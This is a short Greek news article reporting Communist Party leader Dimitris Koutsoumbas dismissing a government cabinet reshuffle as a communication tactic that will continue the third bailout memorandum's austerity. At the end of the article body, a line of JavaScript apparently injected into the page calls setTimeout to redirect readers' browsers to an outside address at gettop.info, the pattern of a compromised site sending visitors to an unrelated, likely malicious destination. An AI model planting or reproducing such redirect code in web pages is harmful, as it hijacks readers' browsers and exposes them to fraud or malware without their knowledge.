Κουτσούμπας για ανασχηματισμό: Τι είχες Γιάννη, τι είχα πάντα

0
11

 

Με το σκωπτικό σχόλιο «Τι είχες Γιάννη, τι είχα πάντα» αναφέρθηκε ο γγ της ΚΕ του ΚΚΕ Δημήτρης Κουτσούμπας στον κυβερνητικό ανασχηματισμό. Ο κ. Κουτσούμπας, απαντώντας σε σχετική ερώτηση, χαρακτήρισε ως «επικοινωνιακή τακτική» τον ανασχηματισμό και συμπλήρωσε ότι «δεν πρόκειται να δοθεί λύση σε κανένα πρόβλημα».

Ειδικότερα ο κ. Κουτσούμπας δήλωσε ότι «οι κυβερνητικοί ανασχηματισμοί και ο συγκεκριμένος δε θα δώσουν καμία λύση σε κανένα πρόβλημα, πέρα από μια επικοινωνιακή τακτική της κυβέρνησης που προσπαθεί να βελτιώσει το προφίλ της, το οποίο έχει πληγεί βάναυσα εξαιτίας των αντιλαϊκών πολιτικών της και των μέτρων που παίρνει για τους εργαζόμενους, τους συνταξιούχους, τη νεολαία, τις λαϊκές οικογένειες».

Και συμπλήρωσε πως «αυτό το κυβερνητικό σχήμα θα συνεχίσει στην ίδια κατεύθυνση υλοποίησης του 3ου μνημονίου και όλων των αντιλαϊκών αναδιαρθρώσεων. Νέα μέτρα έρχονται χωρίς να σημαίνει ότι θα αποφύγουμε και το 4ο μνημόνιο…». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here